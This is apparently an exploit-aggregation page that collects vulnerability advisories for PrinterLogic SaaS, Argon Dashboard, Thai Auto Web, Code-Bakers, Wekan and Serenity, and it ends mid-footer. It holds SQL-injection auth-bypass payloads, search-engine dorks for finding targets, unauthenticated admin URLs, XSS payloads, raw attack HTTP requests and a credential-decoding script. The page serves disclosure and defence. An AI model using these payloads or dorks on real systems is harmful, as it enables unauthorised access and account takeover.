Latest exploits :: CodePwn

<pre><code>PrinterLogic SaaS, multiple vulnerabilities =========================================================== PrinterLogic's Enterprise Print Management software allows IT professionals to simplify printer driver management and empower end users. -- https://www.printerlogic.com/ Background ---------------------------------- The following findings were identified by performing both dynamic testing of the PrinterLogic SaaS platform and code analysis of the source code contained in the virtual appliance available for download from the PrinterLogic website (Build 1.0.757: July 29th, 2022). Credit ----------------------------------- The vulnerabilities were discovered by Eldar Marcussen, Gareth Phillips, Jeff Thomas, Luke Symons, Nadeem Salim, Stephen Bradshaw, Tony Wu and Yianna Paris. OVE-20230524-0001 Authentication bypass =========================================================== As the application is not using a central framework for handling authentication and authorization the individual PHP files must all implement authentication and authorization checks in a consistent same way. However, this is not the case and many of the administrative files are missing authentication checks completely, allowing unauthenticated access to administrative scripts via their direct URLs. For example: * https://example.printercloud10.com/admin/query/reports.php?action=start_database_query&export=0&report_type=Overview+-+By+Week&sort_by=&sort_order=0&page=1&start_date=2023%2F01%2F11&stop_date=2023%2F01%2F11&start_time=12%3A00+AM&stop_time=11%3A59+PM&time_offset=39600&order=&user_name=&job_title=&computer_name=&manager_name=&department_name=&printer_name=&printer_type=printer_type_tcpip&job_type=job_type_scan&user_name_wildcard=*&company_name_wildcard=*&job_title_wildcard=*&manager_name_wildcard=*&department_name_wildcard=*&printer_name_wildcard=*&folder_path=Test&show_tcpip_printers=1&show_usb_printers=1&show_folder_accumulate=0 * https://example.printercloud10.com/admin/api/advanced-groups?limit=25 It also appears possible for an unauthenticated attacker to alter the idp configuration of the SaaS service, however due to lack of integration this was not tested further, the following request contains no authentication or session details, but did receive a `{ "message":"success"}` json response: ``` PUT /api/authn/save-idp-settings HTTP/2 Host: example.printercloud10.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Content-Type: application/json Content-Length: 2 {} ``` OVE-20230524-0002 SQL injection =========================================================== Overall the application does not use parameterized queries when retrieving data, but rather uses a custom DAO framework which utilises several escaping functions that attempt to prevent SQL injection using various string handling functions. These are either custom functions - a practice that is not recommended, or rely on mysqli_real_escape_string(), which has a number of flaws, resulting in conditions where SQL injection is possible. For example, the following function that tries to avoid injection via the backtick character is flawed as it does not also handle escape sequences: ```php public function escapeMySQLSchemaName($identifier) { return "`" . str_replace("`", "``", $identifier) . "`"; } ``` If an attacker supplied the string ```abc\`,injected``` then function would return ```abc\``,injected``` where the first backtick is escaped and the second terminates an existing backtick defined string. In some cases, input does not appear to be filtered or validated at all. For example, the offset parameter in the admin/query/reports.php script mentioned in the authentication bypass issue, We can simulate this by combining the functions from the different files as follows and see that the offset value is successfully injected, however due to how MySQL handles group by expressions it would be difficult to find an injection payload that doesn't break the SQL syntax and has a valid group by statement. ```php // print_stat_dao.php gets called from overview_total_per_week() function per_week_columns($time_offset) { // Use UTC for the "WHERE" clause (since printed, $start and $stop are in UTC), but local time for everything else $local_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)"; return "WEEK($local_printed, 2) AS current_week, YEAR($local_printed) AS current_year, $local_printed AS local_printed "; } function per_week_group_by($time_offset) { $adjusted_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)"; return "WEEK($adjusted_printed, 2)"; } function per_week_order_by($time_offset) { $adjusted_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)"; return "YEAR($adjusted_printed), WEEK($adjusted_printed, 2)"; } function per_year_group_by($time_offset) { $adjusted_printed = "TIMESTAMPADD(SECOND, $time_offset, printed)"; return "YEAR($adjusted_printed)"; } // print_stat_dao.php helper function // Date allows invalid data in time_offset // is_valid_date_time does not, but offset isn't used there (FTW!) function create_start_stop_dates($start_date, $start_time, $stop_date, $stop_time, $time_offset) { // Convert dates to UTC $start = $start_date . " " . $start_time; $stop = $stop_date . " " . $stop_time; if (!is_valid_date_time($start_date, $start_time)) { echo "Invalid start date/time: $start"; return false; } if (!is_valid_date_time($stop_date, $stop_time)) { echo "Invalid end date/time: $stop"; return false; } if (strtotime($start) > strtotime($stop)) { echo "Start date/time is later than end date/time: $start > $stop"; return false; } $start = date("Y-m-d H:i:00", strtotime($start_date . " " . $start_time) - $time_offset); $stop = date("Y-m-d H:i:59", strtotime($stop_date . " " . $stop_time) - $time_offset); return array($start, $stop); } // Helper function requires specific formats for start/stop date/time function is_valid_date_time($date, $time) { $format = "Y/m/d h:i A"; $date = $date . " " . $time; $current = DateTime::createFromFormat($format, $date); if (!$current) return false; return $current && $current->format($format) == $date; } // Simulate user supplied data and flow for overview_total_per_week() in print_stat_dao.php // This gets called from ../../helpers/reports.php for the following report type: // case "Overview - By Week": // 101 array_push($ids, // 102 $print_stat_dao->overview_total_per_week($start_date, $start_time, $stop_date, $stop_time, $time_offset)); $time_offset="600, injected)) -- "; $start_date="2021/01/01"; $start_time="11:25 AM"; $stop_date="2021/01/01"; $stop_time="11:55 AM"; $dates = create_start_stop_dates($start_date, $start_time, $stop_date, $stop_time, $time_offset); //var_dump($dates); $start = $dates[0]; $stop = $dates[1]; $per_week_columns = per_week_columns($time_offset); $per_year_group_by = per_year_group_by($time_offset); $per_week_group_by = per_week_group_by($time_offset); $per_week_order_by = per_week_order_by($time_offset); $permissions_filtered_print_stats_where_clause = "1=1"; $query = " SELECT SUM(mono_duplex_count + mono_simplex_count + color_duplex_count + color_simplex_count) as total_pages, SUM(mono_duplex_cost + mono_simplex_cost + color_duplex_cost + color_simplex_cost) AS total_cost, $per_week_columns FROM ppp_print_stats WHERE (printed BETWEEN '$start' AND '$stop') and (job_type <> 4) and ($permissions_filtered_print_stats_where_clause) GROUP BY $per_year_group_by, $per_week_group_by ORDER BY $per_week_order_by"; echo "$query\n;\n\n\n"; ``` OVE-20230524-0003 Cross site scripting =========================================================== Several instances of cross site scripting were identified in the application: * https://example.printercloud10.com/admin/query/advanced_search.php (q parameter) * https://example.printercloud10.com/app/app_requests.php (action parameter) * https://example.printercloud10.com/generators/standalone_autodownload_applet.php (name parameter) These could be used to attack application users or hijack an administrative account by leaking the users session cookies via the /admin/cookies URL. OVE-20230524-0004 Session fixation =========================================================== The /admin/query/verify-login.php script does not issue a new session identifier after login. An attacker could prime a known session id for a user via xss, a phishing or watering hole attack and then later access the application using the known session id to bypass authentication. The following scripts also appears to grant full/partial session control based on url parameters: * Http/Api/Controllers/PrinterController.php: $sessionId = $request->input('sessionId'); * console_release/xerox/xerox_session.php: $xerox_session_vo->id = requestint('session', 0); * console_release/xerox/xerox_session.php: $xerox_session_vo->session_id = requeststr('session_id', ''); * console_release/xerox/xerox_session.php: $xerox_session_vo->id = requestint('session', 0); * state/query/console_release.php: $_SESSION['toshibaSessionId'] = requeststr('session_id', ''); OVE-20230524-0005 Password in URL =========================================================== It is possible to login as admin via: * https://example.printercloud10.com/admin/query/verify_login.php?user=MHg1flFXUnRhVzUySDI5QUNsOFJLQlUwUUV0amNTWnlNVHRCS1NNK0dSRkZSVU5XQTNjZkRYa1JSeXRYWDJsQktnNVhkQTFUSGlackxRRkRKbEVHRE&password=MHgxNn5ORVZPVWxWaU0xQkRielJoYzFkcVYyOXdja1pCUlJONldrRmNhVjROUW5wSUh5STVaMUZERFdSZlJHTUNTUjVEY0VKZkx3SXhCRkF5SURaRU&credential_enc=true This could lead to passwords leaking to third parties via referrer headers, browser history, server logs, proxy logs, URL shortening services, etc. Although these passwords are encoded in the URL, they are trivial to decode to plaintext as evidenced elsewhere in the report OVE-20230524-0006 Plaintext passwords in logs =========================================================== The application was found to log request data which may include passwords and, in some cases, explicitly log plaintext passwords. This includes, but is not limited to: * /console_release/hp/install_popup_load.php ```php $XRX_USERNAME = substr(base64_decode(requeststr('username', '')), 0, -30); $XRX_PASSWORD = Printer::unObfuscate(requeststr('password', '')); Log::debug('hp, 1.txt, ' . requeststr('username', '') . ', ' . $XRX_USERNAME . ', ' . requeststr('password', '') . ', ' . $XRX_PASSWORD); ``` OVE-20230524-0007 Weak password encryption/encoding in use =========================================================== The application appears to be storing passwords using unsalted sha1 hashing, and transmitting authentication data using a custom double base64 encoding, as seen in the URL in password issue. lib/dao/user_dao.php line: 154 ```php function make_user($username,$mypass,$first,$last,$type,$myco,$email) { //this function is very similar to the automatically created new_XXX function of daos... //I've converted your function just so you still have it. $securepass = sha1($mypass); $vo=new user_vo(); $vo->str_username=$username; $vo->str_my_password=$securepass; $vo->str_user_status="Active"; $vo->str_first_name=$first; $vo->str_last_name=$last; $vo->int_user_type=$type; $vo->account_id=$myco; $vo->str_email_address=$emai l; return $this->new_user($vo); } ``` The application uses a double base64 encoding to obfuscate usernames and passwords, with a length field to avoid reading padding data. However, they can easily be recovered with a simple script: ```php function decodeCredentials($encodedStr) { $firstDecode = base64_decode($encodedStr); if (empty($firstDecode)) { return ''; }//end if $encodedParts = explode('~', $firstDecode); if (count($encodedParts) < 2) { return ''; }//end if // length of the unencoded credential $len = hexdec($encodedParts[0]); $decodedCredential = base64_decode($encodedParts[1]); if (empty($decodedCredential)) { return ''; }//end if //extract the unencoded credential from the padding $credential = substr($decodedCredential, 0, $len); return urldecode($credential); } // outputs 4ENRUb3PCo4asWjWoprFAE echo decodeCredentials("MHgxNn5ORVZPVWxWaU0xQkRielJoYzFkcVYyOXdja1pCUlJONldrRmNhVjROUW5wSUh5STVaMUZERFdSZlJHTUNTUjVEY0VKZkx3SXhCRkF5SURaRU"); ``` OVE-20230524-0008 Insufficient CSRF protection =========================================================== The application does not enforce CSRF checks for the majority of its forms, even for the requests that have a value present in a header, cookie or form, testing found that changing or removing the value had no actual impact on the success of the operation: ``` POST /admin/query/reports.php HTTP/2 Host: example.printercloud10.com Cookie: PHPSESSID=ubbd04d1j65555mv2t8p07eqam; XSRF-TOKEN=eyJpdiI6IisrWTlaY0ZTWUJSRUlUWU5FLzJ5Rnc9PSIsInZhbHVlIjoiSHlybzZGME02NGFSRGVWcTlQVTA2amgxWmVtN3VESzVxVm1kUlZQcFd3N1gxa09CWW1xNE43elA2SDh4dlZKMk1MMHhEd1RDT0NJNGhIWWZ5SzkyUUQzd3oyS1ppQWc0dGdkb1V1a0M2NjRJcWR0TUpLMjI3a1JQS2MwVTVrclciLCJtYWMiOiJmNjQ3NmNkMzQyNDIzZDAyMWYxNWI3ZTZiMjRjMjdkMGFkOWRhMGYxODNhZWQ4NjIyMTY2ODk4ZmVmNDA3ZjE0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9nS1poYmZXRmlXTHJyTDhHY3lxL1E9PSIsInZhbHVlIjoiMW1lZVN3a0lSYUlWNHFiWjJjWHMwZ1VtSXgzeWZqT3BsTVJXNEo1cHkvNVRmSE5MRFdyK3FuaFpOR3RBR0tJdDhLVjk3TGloc0h5YjNtcHgzNjEvMWl1WElxYmd3YTV2aDI3dTFSY1ZjaUx0ZXRJRFN0ZjRXbE81WisxK25WZC8iLCJtYWMiOiI5OGZlMGFkYmFmY2IxYjk3NWI3OGJkNzgyMjM5NjRmYzczYTdhMjVlYTU2Njg3MWIzOWJjNDM0YmRmYzExZmRiIiwidGFnIjoiIn0%3D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Csrf-Token: THIS IS NOT A VALID TOKEN X-Requested-With: XMLHttpRequest Content-Length: 596 Origin: https://example.printercloud10.com Dnt: 1 Referer: https://example.printercloud10.com/admin/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=start_database_query&export=0&report_type=Overview+-+B%26W%2FColor&sort_by=&sort_order=&page=&start_date=2023/01/11&stop_date=2023/01/11&start_time=12%3A00+AM&stop_time=11%3A59+PM&time_offset=1&order=&user_name=&job_title=&computer_name=&manager_name=&department_name=&printer_name=&printer_type=printer_type_tcpip&job_type=job_type_scan&user_name_wildcard=*&company_name_wildcard=*&job_title_wildcard=*&manager_name_wildcard=*&department_name_wildcard=*&printer_name_wildcard=*&folder_path=Test&show_tcpip_printers=1&show_usb_printers=1&show_folder_accumulate=0 ``` OVE-20230524-0009 Insufficient anti virus protection =========================================================== Printer drivers are manually uploaded by admins and assigned to printers. The PrinterLogic application allows drivers containing known malicious code to be uploaded. OVE-20230524-0010 Insufficient authorization checks =========================================================== While the application supports several user levels, most of the individual PHP scripts does not implement granular access control based on roles, but simply rely on an authentication check (if present) like this: ```php if(!GLOBALS::$login->is_logged_in()) { respond_expired(); die(); } ``` This is distinctive from pages that implements a role based check, such as /admin/design/management_accountts_users.php ```php $user_permissions = UserPermissions::create_for_current_user(); $pagePermission = $user_permissions->get_options_value_general(Constant::ToolsMenuUsers); if (!$pagePermission) { respond_html_failure(UserPermissions::INSUFFICIENT_PERMISSIONS_MESSAGE, ""); return; } ``` OVE-20230524-0011 Administrative user email enumeration =========================================================== The forgot password function will confirm if an email address exists or not and can be used to enumerate users/emails. OVE-20230524-0012 Arbitrary content inclusion via iframe =========================================================== The following URL will include an arbitrary URL in an iframe, this could be used to redirect the application using a frame busting technique, execute JavaScript or initiate file downloads from an untrusted source. * https://example.printercloud10.com/generators/standalone_autodownload_applet.php?server=https://attackerurl&node_id=bbbb&file=ccccc&dialog=dddd&name=eeee&path=fffff OVE-20230524-0013 Remote network scanning (XSPA)/DoS =========================================================== There are several php files that will initiate user-controlled connections to third party IP/port combinations over protocol such as LDAP, IMAP, SMTP, telnet, etc. Telnet scanning (and possibly others) runs until the connection closes so could lead to DoS condition by consuming all web server workers * https://example.printercloud10.com/email/email_printing_test.php?test_type=CONNECTION&connection_type=IMAP * https://example.printercloud10.com/admin/query/test_ldap_settings.php?action=test_connection_to_server&server=ldapsdns,.com&ldaps=0&ldap_port=8080 * https://example.printercloud10.com/console_release/fast_release/rfideas_241_install.php?printer_id=1&ip_address=lostworldsbbs.com OVE-20230524-0014 Insufficient signature validation =========================================================== Printer drivers are manually uploaded by admins and assigned to printers. The PrinterLogic application allows drivers to be uploaded that are not cryptographically signed with valid certificates from a trusted authority. OVE-20230524-0015 Device impersonation =========================================================== In at least one area of the PrinterLogic system, authorised devices are identified by machine name. It is possible to rename a host and have this impact another authorised devices records in at least one place. OVE-20230524-0016 Oauth security bypass =========================================================== PrinterLogic clients need an authorization code to authenticate and being authorised devices. These are sent by the Printer Installer Client desktop application, which receives an access token as a response. This token is then used for all authenticated requests from the desktop application. When signing into the web application, there is an option to sign in as the Current User. This sends encrypted information to the server using the siddata parameter. As symmetric encryption is used, and the key is easily obtainable from the client-side applications, it is possible to decrypt, modify and re-encrypt this data. OVE-20230524-0017 Cookie returned in response body =========================================================== The URL /admin/cookies returns the cookie values in the page body. This breaks the HTTPOnly cookie security control used to prevent JavaScript from accessing the cookie values during a session hijacking attack. OVE-20230524-0018 Known vulnerable components in use =========================================================== The use of third-party JavaScript libraries can introduce a range of DOM-based vulnerabilities, including some that can be used to hijack user accounts like DOM-XSS. 4 instances of this issue were identified, at the following locations: * /admin/map_bg/map_upload_bg.php * /assets/scripts/common-bb625e26df.js * /assets/scripts/common-fcc1983a7e.js * /assets/scripts/jquery-40c7c38831.form.js Timeline =========================================================== 2023-02-01 - Vulnerability details shared with CERT/CC 2023-02-09 - CERT/CC reached out to vendor 2023-02-10 - Reached out to vendor directly advicing them of the CERT/CC submission 2023-03-14 - Vendor responded 2023-03-14 - Updated CERT/CC on vendors response 2023-02-14 - CERT/CC reached out to vendor again 2023-02-15 - Responded to vendor, again directing them to CERT/CC for vulnerability details and disclosure coordination 2023-02-17 - Vendor responded 2023-02-17 - Responded to vendor, again directing them to CERT/CC for vulnerability details and disclosure coordination 2023-03-17 - Updated CERT/CC on vendors response 2023-03-28 - Requested status update from CERT/CC 2023-04-06 - Requested status update from CERT/CC 2023-04-06 - CERT/CC adviced vendor has responded to emails, but not joined the VINCE platform 2023-04-11 - Reached out to vendor directly on behalf of CERT/CC 2023-04-11 - Vendor responded 2023-04-14 - Requested update from CERT/CC 2023-04-21 - Vendor joins VINCE 2023-04-21 - Vendor requests extension to disclosure timeline 2023-04-22 - Vendor advices they cannot locate the vulnerability details 2023-04-25 - Offer vendor 30 day timeline extention, provide copy of draft advisory and request CVE identifiers from CERT/CC 2023-04-26 - CERT/CC confirms vulnerability details availability to vendor, advices to request CVEs directly from MITRE 2023-04-26 - Vendor confirms receipt of vulnerability details 2023-04-27 - Submit CVE request to MITRE 2023-05-09 - Vendor shares vulnerability details with their product team 2023-05-17 - Request update from MITRE 2023-05-18 - Advice vendor and CERT/CC that advisory will use OVE identifiers if CVE identifiers have not been issued prior to disclosure 2023-05-18 - Vendor request additional disclosure delay in order to triage issues 2023-05-24 - Vendor request additional disclosure delay in order to triage issues 2023-05-24 - Vendor disputes issues OVE-2023240006 (legacy code), OVE-2023240008 (legacy code), OVE-2023240010 (researchers didn't specify all the places this needs to be fixed), OVE-2023240014 (won't fix). 2023-05-25 - Public disclosure ????-??-?? - Patch available </code></pre>

<pre><code>==================================================================================================================================== | # Title : Argon Dashboard 2 Auth By Pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit) | | # Vendor : https://github.com/creativetimofficial | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''=' [+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.php Greetings to :============================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*| =========================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Thai Auto Web 1.2 Unauthorized administrative access Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.thaiautoweb.com/ | | # Dork : "Powered By ThaiAutoWeb" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Unauthorized administrative access possible to act and modify anything. [+] Use payload : /webadmin_/allcar.php [+] https://127.0.0.1/www/ยอดเจริญยนต์.com/webadmin_/allcar.php Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Code-Bakers v1.0 Unauthorized administrative access Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.codebakers.co.uk/ | | # Dork : "dishes.php?res_id=" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Unauthorized administrative access possible to act and modify anything. [+] Use payload : /admin/update_menu.php or /admin/add_users.php [+] https://127.0.0.1/foodiejunction.store/admin/update_menu.php Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230517-0 > ======================================================================= title: Stored XSS vulnerability in rename functionality product: Wekan (Open-Source kanban) vulnerable version: <=6.74 fixed version: 6.75 or higher CVE number: CVE-2023-28485 impact: Medium homepage: https://wekan.github.io found: 2022-12-30 by: Heiner Liesegang (Office Berlin) SEC Consult Vulnerability Lab An integrated part of SEC Consult. SEC Consult is part of Eviden, an Atos business Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "WeKan ® is an completely Open Source and Free software collaborative kanban board application with MIT license. Whether you’re maintaining a personal todo list, planning your holidays with some friends, or working in a team on your next revolutionary idea, Kanban boards are an unbeatable tool to keep your things organized. They give you a visual overview of the current state of your project, and make you productive by allowing you to focus on the few items that matter the most." Source: https://github.com/wekan/wekan Business recommendation: ------------------------ Patch the application with the latest update supplied by the vendor. Vulnerability overview/description: ----------------------------------- 1) Stored Cross-Site Scripting (CVE-2023-28485) An authenticated attacker with the role 'BoardAdmin' is able to rename file attachments of Kanban cards. Being an admin of the Wekan instance is not required in order for this exploit to work, as any user can obtain 'BoardAdmin' privileges by creating a new Kanban board. The 'renameAttachment' method does not sanitise user input and allows embedding XSS payloads in the specified filename. The stored XSS payload is triggered by opening the attachment as the modified filename is displayed in the header bar of the file preview. Proof of concept: ----------------- 1) Stored Cross-Site Scripting (CVE-2023-28485) The following steps are necessary to exploit the vulnerability: 1. Log into the application with at least "user" privileges 2a. Open a Kanban board in which you have 'BoardAdmin' privileges 2b. Or, create a new Kanban board otherwise 3. Create a Kanban card if none exists 4. Open Kanban card to edit it 5. If there is no attachment in the card, upload one 6. Click on "Attachment Actions" under the attachment and select "Rename" 7. Include arbitrary XSS payload such as the following inside the filename: "<script>alert('Stored XSS')</script>" 8. Select "Save" to embed the XSS payload Any user with access to the board clicking on the attachment preview triggers the stored XSS. In case the used Kanban board is set to "public" any person with a link to the board can access the targeted card and trigger the payload inside the attachments' filename. Vulnerable / tested versions: ----------------------------- The following versions have been tested to be vulnerable: * v6.64 * v6.69 * v6.71 According to the vendor, all versions before 6.75 are affected as well. Vendor contact timeline: ------------------------ 2023-02-16: Contacting vendor security contact through support@wekan.team. 2023-02-21: Vendor responded requesting a recheck of fixes in version 6.75. 2023-02-27: Security patch is confirmed to fix vulnerability. 2023-03-14: CVE number requested. 2023-05-17: Public release of security advisory. Solution: --------- The vendor provides a patched version which should be installed immediately. The version 6.75 or higher provides the corresponding security patch: https://github.com/wekan/wekan Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult is part of Eviden, an Atos business Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part of Eviden, an Atos business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Heiner Liesegang / @2023 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230516-0 > ======================================================================= title: Multiple Vulnerabilities product: Serenity and StartSharp Software vulnerable version: < 6.7.1 fixed version: 6.7.1 or higher CVE number: CVE-2023-31285, CVE-2023-31286, CVE-2023-31287 impact: high homepage: https://serenity.is found: 2023-02-28 by: Fabian Densborn (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult. SEC Consult is part of Eviden, an Atos business Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- Serenity Software is a software vendor that distributes the Serenity Platform. "Serenity is an ASP.NET Core / TypeScript application platform designed to simplify and shorten development of data-centric business applications with a service based architecture." Source: https://github.com/serenity-is Business recommendation: ------------------------ SEC Consult recommends Serenity users to install the latest update and review the vendor's changelog for further information. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Vulnerability overview/description: ----------------------------------- 1) Arbitrary File Upload to Stored Cross-Site Scripting (XSS) (CVE-2023-31285) The application allows users to upload profile pictures for users. It was identified that an attacker has the possibility to upload arbitrary malicious files. Although some specific file endings are not allowed, it is still possible to upload files without an extension. It was possible to: • Upload malicious HTML files that will infect the user's browser with malicious JavaScript. As a result, the user's DOM is fully compromised. • Upload malware that will infect the user's operating system upon download and local execution. Note: Although the option for uploading new profile pictures is only visible to power users, users with lower privileges can still trigger the upload functionality. 2) User Enumeration (CVE-2023-31286) It is possible to collect valid email addresses by interacting with the "forgot password" function of the application. This vulnerability is useful to increase the efficiency of brute-force attacks. If the email address is known, it is easier to find the corresponding password. 3) Reusable Password Reset Tokens (CVE-2023-31287) The web application provides the possibility to reset the password via email. The corresponding email contains a password reset link which includes a user-specific token. When visiting the link, the user can set a new password for this account. After changing the password, the password reset link remains valid (3 hours) and can be used a second time to change the password of the user. Proof of concept: ----------------- 1) Arbitrary File Upload to Stored Cross-Site Scripting (XSS) (CVE-2023-31285) A user can upload arbitrary files to the server, but some file extensions like .aspx are not allowed. Nevertheless, malicious files like Word documents with enabled macros or other executable malware can be uploaded. There also seems to be no anti-virus scan enabled for these files, as it is possible to upload the EICAR test file which is flagged as malicious by all antivirus software. Additionally, it is also possible to attack a privileged power user, by generating a malicious HTML page, that on visit escalates the role of the attacker user. This is possible, because the file is uploaded to the same domain and therefore the containing JavaScript executes in the same context as the application. The impact of this vulnerability is therefore equal to that of a stored XSS vulnerability. To upload a malicious HTML file an authenticated user without the role of a power user can send the following request: -------------------------------------------------- POST /File/TemporaryUpload HTTP/2 Host: demo.serenity.is Cookie: [...] Content-Type: multipart/form-data; boundary=--boundary Origin: https://demo.serenity.is [...] --boundary Content-Disposition: form-data; name="Serenity_ImageUploadEditor31[]"; filename="test.html" Content-Type: image/png <html> <head></head> <body> <h1>SEC Consult</h1> <script>alert(document.domain)</script> </body> </html> --boundary-- -------------------------------------------------- The response reveals the path of the uploaded file: -------------------------------------------------- HTTP/2 200 OK Server: nginx/1.18.0 (Ubuntu) Content-Type: application/json [...] { "TemporaryFile":"temporary/f3c960aca7724409a3c4c6e597ce5b92.html", "Size":110, "IsImage":false, "Width":0, "Height":0 } -------------------------------------------------- The uploaded file can then be found under /upload/temporary/f3c960aca7724409a3c4c6e597ce5b92.html. The final link will look benign thus it is possible to attack administrator users and escalate the privileges of the own user. 2) User Enumeration (CVE-2023-31286) The "forgot password" page lets users request a new password reset mail. They need to enter their email address which corresponds to their account and receive a mail containing a link to reset their password. Unfortunately, the response of this request leaks if a user with the provided email address exists or not. If an attacker wants to check if a user account with a specific email exists, he can send the following request: -------------------------------------------------- POST /Account/ForgotPassword HTTP/2 Host: demo.serenity.is Origin: https://demo.serenity.is Content-Type: application/json [...] { "Email":"emailToCheck@sec-consult.com" } -------------------------------------------------- If the user with this mail does not exist, the response will look like this: -------------------------------------------------- HTTP/2 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Content-Type: application/json { "Error": { "Code":"CantFindUserWithEmail", "Message":"Can't find a user with that e-mail adress!" } } -------------------------------------------------- If the user with this mail address does exist, the response will look like this: -------------------------------------------------- HTTP/2 200 OK Server: nginx/1.18.0 (Ubuntu) Content-Type: application/json [...] {} -------------------------------------------------- 3) Reusable Password Reset Tokens (CVE-2023-31287) When resetting the password via the "forgot password" functionality on the login screen, an email containing a password reset link is sent to the user. When clicking on this link, a user can choose a new password for his account. However, after changing the password to a new one, the password reset link remains valid. It can be used a second time to update the user's password although it was already changed. If an attacker gets access to the browser history of the user, he can change the password of the user's account and access it afterwards. Vulnerable / tested versions: ----------------------------- The following versions are affected: < 6.7.0 Vendor contact timeline: ------------------------ 2023-04-05: Contacting vendor through sales@serenity.is 2023-04-05: Vendor responds to send advisory to support@serenity.is 2023-04-05: Advisory sent to vendor. 2023-04-06: Vendor released fixes for all three vulnerabilities, file upload vulnerability was not fixed properly though. 2023-04-07: SEC Consult informs vendor about not properly fixed file upload. 2023-04-07: Vendor released proper fix for file upload vulnerability in v6.7.1. 2023-04-27: CVE numbers assigned. 2023-05-16: Public release of security advisory. Solution: --------- The vendor provides a patch v6.7.1 which includes the fixes for the identified security issues. The new version can be downloaded here: https://github.com/serenity-is/Serenity The vendor explicitly notes the following in the changelog: "Serene/StartSharp users must either create a new project from the 6.7.0+ template or manually apply the relevant changes from this commit to their existing applications after updating Serenity packages to 6.7.0+" Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult is part of Eviden, an Atos business Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part of Eviden, an Atos business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: 